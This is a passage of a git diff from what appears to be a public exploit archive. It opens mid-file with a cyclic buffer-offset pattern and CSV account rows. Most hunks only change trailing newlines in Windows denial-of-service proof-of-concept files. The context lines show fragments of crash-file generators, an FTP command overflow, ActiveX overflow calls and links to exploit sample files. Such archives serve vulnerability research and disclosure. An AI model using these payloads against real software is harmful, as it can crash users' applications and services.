d8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M@protekresearchlab.com","francis","postoffice","domaine","protekresearchlab.com",,"2","90BF54F0-0BBE-0000-8025-5269201B97AD","wkb","francis.admin","francis.admin",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, -"U","toto",,,"toto",,,"toto@protekresearchlab.com","toto@protekresearchlab.com","toto","postoffice","domaine","protekresearchlab.com",,"2","81141E20-0BB7-0000-85EA-054B134F2018","my2","toto.admin","toto.admin",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +"U","toto",,,"toto",,,"toto@protekresearchlab.com","toto@protekresearchlab.com","toto","postoffice","domaine","protekresearchlab.com",,"2","81141E20-0BB7-0000-85EA-054B134F2018","my2","toto.admin","toto.admin",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, \ No newline at end of file diff --git a/platforms/windows/dos/1856.url b/platforms/windows/dos/1856.url index 1fcc42456..313b3fbac 100755 --- a/platforms/windows/dos/1856.url +++ b/platforms/windows/dos/1856.url @@ -21,4 +21,4 @@ URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA * Remember to save the file with a .url extension. */ -// milw0rm.com [2006-05-31] +// milw0rm.com [2006-05-31] \ No newline at end of file diff --git a/platforms/windows/dos/18584.txt b/platforms/windows/dos/18584.txt index 794f40c9e..c4b875949 100755 --- a/platforms/windows/dos/18584.txt +++ b/platforms/windows/dos/18584.txt @@ -350,4 +350,4 @@ Credits: Ucha Gobejishvili ( longrifle0x) -Video Demonstration: http://www.youtube.com/watch?v=uN87KAm53Zg +Video Demonstration: http://www.youtube.com/watch?v=uN87KAm53Zg \ No newline at end of file diff --git a/platforms/windows/dos/18602.txt b/platforms/windows/dos/18602.txt index d336731ca..511ad7497 100755 --- a/platforms/windows/dos/18602.txt +++ b/platforms/windows/dos/18602.txt @@ -89,4 +89,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18606.txt b/platforms/windows/dos/18606.txt index 1e62e4647..1ddb50184 100755 --- a/platforms/windows/dos/18606.txt +++ b/platforms/windows/dos/18606.txt @@ -191,4 +191,4 @@ not optimized at all. http://technet.microsoft.com/en-us/security/bulletin/ms12-020 -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18628.py b/platforms/windows/dos/18628.py index 93f5e1245..67108165d 100755 --- a/platforms/windows/dos/18628.py +++ b/platforms/windows/dos/18628.py @@ -58,4 +58,4 @@ for i in range (1, 5): sock.close() print "[!] Exploit succeed. Target should crashed." -sys.exit() +sys.exit() \ No newline at end of file diff --git a/platforms/windows/dos/18633.txt b/platforms/windows/dos/18633.txt index edd8512bb..82225ae04 100755 --- a/platforms/windows/dos/18633.txt +++ b/platforms/windows/dos/18633.txt @@ -91,4 +91,4 @@ a use-after-free by e.g. tricking a user into opening a specially crafted file. =========== http://www.protekresearchlab.com/exploits/PRL-2012-07.tif -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18633.tif +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18633.tif \ No newline at end of file diff --git a/platforms/windows/dos/18636.txt b/platforms/windows/dos/18636.txt index b654b4561..31b4d41f7 100755 --- a/platforms/windows/dos/18636.txt +++ b/platforms/windows/dos/18636.txt @@ -733,4 +733,4 @@ int main(int argc, char *argv[]) printf("File %s created!\n", FN); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/18637.txt b/platforms/windows/dos/18637.txt index fc819230b..50ee5f686 100755 --- a/platforms/windows/dos/18637.txt +++ b/platforms/windows/dos/18637.txt @@ -41,4 +41,4 @@ print "\n\n[*] Creating $file file...\n"; open ZSL, ">./$file" || die "\nCan't open $file: $!"; print ZSL $hit; print "\n[.] File successfully mounted!\n\n"; -close ZSL; +close ZSL; \ No newline at end of file diff --git a/platforms/windows/dos/18641.txt b/platforms/windows/dos/18641.txt index a5549ed64..08b181dbf 100755 --- a/platforms/windows/dos/18641.txt +++ b/platforms/windows/dos/18641.txt @@ -48,4 +48,4 @@ for (i=0; i<13999; i++){ x = x + "aaaa"; } obj.SetSource("","","","",x); -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/18654.txt b/platforms/windows/dos/18654.txt index 7e2eb7265..8a34e82bb 100755 --- a/platforms/windows/dos/18654.txt +++ b/platforms/windows/dos/18654.txt @@ -45,4 +45,4 @@ $tring = "\x41" x 70000000; $leepy->Set($tring); print "\n\n*----- Log In and just Paste \/ CTRL+V"; print " into the search box -----*\n\n"; system pause; print "\n\n[*] Starting Spotify\n"; sleep 1; -system('start C:\\Docume~1\\%username%\Applic~1\\Spotify\\spotify.exe'); +system('start C:\\Docume~1\\%username%\Applic~1\\Spotify\\spotify.exe'); \ No newline at end of file diff --git a/platforms/windows/dos/18671.pl b/platforms/windows/dos/18671.pl index 954001ff5..7456cebed 100755 --- a/platforms/windows/dos/18671.pl +++ b/platforms/windows/dos/18671.pl @@ -66,4 +66,4 @@ $ftp->quot('FEAT ' ."$payload"); print "[+] Done\n"; $ftp->quit; exit 0; -#EOF +#EOF \ No newline at end of file diff --git a/platforms/windows/dos/18691.rb b/platforms/windows/dos/18691.rb index dcae59cd2..45fcf2162 100755 --- a/platforms/windows/dos/18691.rb +++ b/platforms/windows/dos/18691.rb @@ -17,4 +17,4 @@ Denial of Service in FoxPlayer version 2.6.0 File.open "Crash.m3u" , "w" do |file| junk = "A" * 40000 file.puts junk -end +end \ No newline at end of file diff --git a/platforms/windows/dos/18716.txt b/platforms/windows/dos/18716.txt index 70cb9a0ac..fd02f0957 100755 --- a/platforms/windows/dos/18716.txt +++ b/platforms/windows/dos/18716.txt @@ -190,6 +190,4 @@ other media, are reserved by Vulnerability-Lab or its suppliers. -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com -Mail: research@vulnerability-lab.com - - +Mail: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/dos/18717.txt b/platforms/windows/dos/18717.txt index 3b4e77c63..4b100f170 100755 --- a/platforms/windows/dos/18717.txt +++ b/platforms/windows/dos/18717.txt @@ -403,6 +403,4 @@ other media, are reserved by Vulnerability-Lab or its suppliers. -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com -Mail: research@vulnerability-lab.com - - +Mail: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/dos/18719.pl b/platforms/windows/dos/18719.pl index a8beffdc5..6c2721f09 100755 --- a/platforms/windows/dos/18719.pl +++ b/platforms/windows/dos/18719.pl @@ -11,4 +11,4 @@ $poc = "H" x 500000; open(m3u, ">poc_death.m3u"); print m3u "$poc"; -print "\n + Exploit created !\n"; +print "\n + Exploit created !\n"; \ No newline at end of file diff --git a/platforms/windows/dos/18755.c b/platforms/windows/dos/18755.c index fc196a6ba..c51195fe4 100755 --- a/platforms/windows/dos/18755.c +++ b/platforms/windows/dos/18755.c @@ -389,4 +389,4 @@ for( i = 0; i < sizeof( hints ) ; i++) -} +} \ No newline at end of file diff --git a/platforms/windows/dos/18765.txt b/platforms/windows/dos/18765.txt index 7111a22df..7ed0deae7 100755 --- a/platforms/windows/dos/18765.txt +++ b/platforms/windows/dos/18765.txt @@ -109,4 +109,4 @@ http://aluigi.org/poc/netiware_1b.zip No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18771.txt b/platforms/windows/dos/18771.txt index 3efddd688..2ca1d4e88 100755 --- a/platforms/windows/dos/18771.txt +++ b/platforms/windows/dos/18771.txt @@ -44,5 +44,4 @@ Y7E4WBoMmMkexYn/iqarbBDDe5lIU8z+9H538u/JhiJfCYoCCKW5ga1MA+64vLCj 8SnMpqB0hupl0LLCXTXapGfefOsm9gkEm31oC9U8Bsi0O4zWF6+Q7EipPLd9AkjC hfANp4pmPDJGnYkagOxx =q6Gx ------END PGP SIGNATURE----- - +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/18774.txt b/platforms/windows/dos/18774.txt index 66fb65d5d..945de5b38 100755 --- a/platforms/windows/dos/18774.txt +++ b/platforms/windows/dos/18774.txt @@ -90,5 +90,4 @@ tj58BQxbcfzZ3gyjlHrZ1ECh7+f/X9GL6kdXAo2jLsNHcnD5fEeo73JUsJKpoMFx ljN1upfItDblkD+I0ylzf7l2VFk+/Q8YHfWEpvdKw6k2X+lFSFPnnmJ7tLtZEjsc m939C+muZ76HDSPRX3vt =Fks2 ------END PGP SIGNATURE----- - +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/18776.txt b/platforms/windows/dos/18776.txt index e1f37578d..2da955ec7 100755 --- a/platforms/windows/dos/18776.txt +++ b/platforms/windows/dos/18776.txt @@ -56,5 +56,4 @@ k2CmmsVWTmYpIJ6Rlt3azIYRGCqRGALiB9Eph7WcZnij6y4PwSsNpf6uMZH864EM J3QTi2Xhn+zEq4XEU7IHRRrFyJQOF+0TUV+qYMR+NuBmPhWXk27n6AXQJbu+RjAm 8dBjL95Ghi8s0VQt4rjb =3c+B ------END PGP SIGNATURE----- - +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/18799.py b/platforms/windows/dos/18799.py index b223b2fd9..2c2afdb9d 100755 --- a/platforms/windows/dos/18799.py +++ b/platforms/windows/dos/18799.py @@ -802,4 +802,4 @@ lame += "\x00\x01\xd6\x00\x46\x01\x5e\x00\x00\x00\x03\x00\x00\x00\x00\x01" lame += "\x08\x01\x36\x01\x3c\x45\x4f\x46\x3e" blessings = open("helpdesk.flm","wb") -blessings.write(lame) +blessings.write(lame) \ No newline at end of file diff --git a/platforms/windows/dos/18819.cpp b/platforms/windows/dos/18819.cpp index 74ba7df53..9a403c61b 100755 --- a/platforms/windows/dos/18819.cpp +++ b/platforms/windows/dos/18819.cpp @@ -62,4 +62,4 @@ void main() GetModuleHandle( 0 ), 0); NtUserCreateWindowEx(_wnd,0x26,(UINT)c); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/18879.rb b/platforms/windows/dos/18879.rb index 5160f8706..34ac19622 100755 --- a/platforms/windows/dos/18879.rb +++ b/platforms/windows/dos/18879.rb @@ -20,4 +20,4 @@ File.open "crash.mef" , "w" do |file| crash = "\x41" * 1000 file.write crash -end +end \ No newline at end of file diff --git a/platforms/windows/dos/18902.rb b/platforms/windows/dos/18902.rb index 3c7026b42..61dec26ef 100755 --- a/platforms/windows/dos/18902.rb +++ b/platforms/windows/dos/18902.rb @@ -30,4 +30,4 @@ Real-DRAW PRO 5.2.4 Import File Crash File.open "Crash.png" , "w" do |file| junk = "A" *1000 file.write junk -end +end \ No newline at end of file diff --git a/platforms/windows/dos/18903.rb b/platforms/windows/dos/18903.rb index 08673cb15..547705c4c 100755 --- a/platforms/windows/dos/18903.rb +++ b/platforms/windows/dos/18903.rb @@ -24,4 +24,4 @@ DVD-Lab Studio 1.25 DAL File Open Crash File.open "Crash.dal" , "w" do |file| junk = "A" *1000 file.write junk -end +end \ No newline at end of file diff --git a/platforms/windows/dos/18916.txt b/platforms/windows/dos/18916.txt index 37a28744b..7bc1ddf56 100755 --- a/platforms/windows/dos/18916.txt +++ b/platforms/windows/dos/18916.txt @@ -72,4 +72,4 @@ arg11= String(6003, "A") arg12=1 target.HIDownloadURLFile arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8 ,arg9 ,arg10 ,arg11 ,arg12 -</script></job></package> +</script></job></package> \ No newline at end of file diff --git a/platforms/windows/dos/18952.txt b/platforms/windows/dos/18952.txt index 13169bd01..ed0d3226d 100755 --- a/platforms/windows/dos/18952.txt +++ b/platforms/windows/dos/18952.txt @@ -48,4 +48,4 @@ $ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3 $ Below You should see link to attachement with PoC: http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18952.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18952.rar \ No newline at end of file diff --git a/platforms/windows/dos/18956.c b/platforms/windows/dos/18956.c index e5e56ce51..a494a2874 100755 --- a/platforms/windows/dos/18956.c +++ b/platforms/windows/dos/18956.c @@ -162,4 +162,4 @@ void recvdata() { fflush(stdout); } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/18962.py b/platforms/windows/dos/18962.py index 19bdca4ab..935754371 100755 --- a/platforms/windows/dos/18962.py +++ b/platforms/windows/dos/18962.py @@ -11,5 +11,4 @@ junk ="\x41"*500 textfile = open("test.asz" , 'w') textfile.write("ASzf Options.dat"+junk) -textfile.close() - +textfile.close() \ No newline at end of file diff --git a/platforms/windows/dos/18964.txt b/platforms/windows/dos/18964.txt index 329841691..421e53e85 100755 --- a/platforms/windows/dos/18964.txt +++ b/platforms/windows/dos/18964.txt @@ -65,4 +65,4 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft ============= http://protekresearchlab.com/exploits/PRL-2012-10.ecw -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18964.ecw +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18964.ecw \ No newline at end of file diff --git a/platforms/windows/dos/18972.txt b/platforms/windows/dos/18972.txt index ab7cf9eb8..40dd57e32 100755 --- a/platforms/windows/dos/18972.txt +++ b/platforms/windows/dos/18972.txt @@ -54,5 +54,4 @@ and can be exploited to cause a stack-based buffer overflow via a specially craf ============= http://protekresearchlab.com/exploits/PRL-2012-11.ttf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18972.ttf - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18972.ttf \ No newline at end of file diff --git a/platforms/windows/dos/19000.py b/platforms/windows/dos/19000.py index d0bca0b24..ff903a47f 100755 --- a/platforms/windows/dos/19000.py +++ b/platforms/windows/dos/19000.py @@ -12,5 +12,4 @@ junk ="\x41"*100 textfile = open("onyiing.cda" , 'w') textfile.write(junk) -textfile.close() - +textfile.close() \ No newline at end of file diff --git a/platforms/windows/dos/19034.cpp b/platforms/windows/dos/19034.cpp index 2d552368f..37c2069cf 100755 --- a/platforms/windows/dos/19034.cpp +++ b/platforms/windows/dos/19034.cpp @@ -68,4 +68,4 @@ int main(){ fputs(_isi, _file); fclose(_file); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/19181.txt b/platforms/windows/dos/19181.txt index 1aafbc00e..c17cadf15 100755 --- a/platforms/windows/dos/19181.txt +++ b/platforms/windows/dos/19181.txt @@ -59,4 +59,4 @@ to cause a heap-based buffer overflow via a specially crafted "Depth" value in a =========== http://www.protekresearchlab.com/exploits/PRL-2012-14.ras -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19181.ras +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19181.ras \ No newline at end of file diff --git a/platforms/windows/dos/19182.txt b/platforms/windows/dos/19182.txt index 7c7f3bb26..35ddd05c5 100755 --- a/platforms/windows/dos/19182.txt +++ b/platforms/windows/dos/19182.txt @@ -60,4 +60,4 @@ overflow via a specially crafted ECW file. =========== http://www.protekresearchlab.com/exploits/PRL-2012-13.ecw -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19182.ecw +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19182.ecw \ No newline at end of file diff --git a/platforms/windows/dos/19183.txt b/platforms/windows/dos/19183.txt index a633684ea..28407925c 100755 --- a/platforms/windows/dos/19183.txt +++ b/platforms/windows/dos/19183.txt @@ -59,5 +59,4 @@ exploited to cause a heap-based buffer overflow via a specially crafted FPX file =========== http://www.protekresearchlab.com/exploits/PRL-2012-12.fpx -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19183.fpx - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19183.fpx \ No newline at end of file diff --git a/platforms/windows/dos/19184.pl b/platforms/windows/dos/19184.pl index 2ca32b639..10beb431a 100755 --- a/platforms/windows/dos/19184.pl +++ b/platforms/windows/dos/19184.pl @@ -14,5 +14,4 @@ my $JUNK= "A" x 10000; my $FILE="Karafun.m3u"; open(my $FILE, ">$FILE") or die "Cannot open $file: $!"; print $FILE $JUNK; -close($FILE); - +close($FILE); \ No newline at end of file diff --git a/platforms/windows/dos/19265.py b/platforms/windows/dos/19265.py index 28b4815ce..195b2f1e7 100755 --- a/platforms/windows/dos/19265.py +++ b/platforms/windows/dos/19265.py @@ -30,4 +30,4 @@ file.close() junk = "\x41" * 100 file = open("PoC.avi","w") file.writelines(junk) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/1927.pl b/platforms/windows/dos/1927.pl index d336b40e5..69a3e2521 100755 --- a/platforms/windows/dos/1927.pl +++ b/platforms/windows/dos/1927.pl @@ -21,4 +21,4 @@ use Spreadsheet::WriteExcel; $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500; $worksheet->write_url(0, 0, "$a", "LINK"); -# milw0rm.com [2006-06-18] +# milw0rm.com [2006-06-18] \ No newline at end of file diff --git a/platforms/windows/dos/19328.txt b/platforms/windows/dos/19328.txt index 519137f2a..319585e70 100755 --- a/platforms/windows/dos/19328.txt +++ b/platforms/windows/dos/19328.txt @@ -206,4 +206,4 @@ Vedor Report = I have sent several notifications to qutecom on this bug in this application but I havn't got any response. Bug Ticket :http://qutecom.org/ticket/399 -mail to : qutecom-dev@lists.qutecom.org +mail to : qutecom-dev@lists.qutecom.org \ No newline at end of file diff --git a/platforms/windows/dos/19331.txt b/platforms/windows/dos/19331.txt index bfc7cf0e0..b91149865 100755 --- a/platforms/windows/dos/19331.txt +++ b/platforms/windows/dos/19331.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may 4) The Code =========== http://protekresearchlab.com/exploits/PRL-2012-22.rle -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19331.rle +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19331.rle \ No newline at end of file diff --git a/platforms/windows/dos/19332.txt 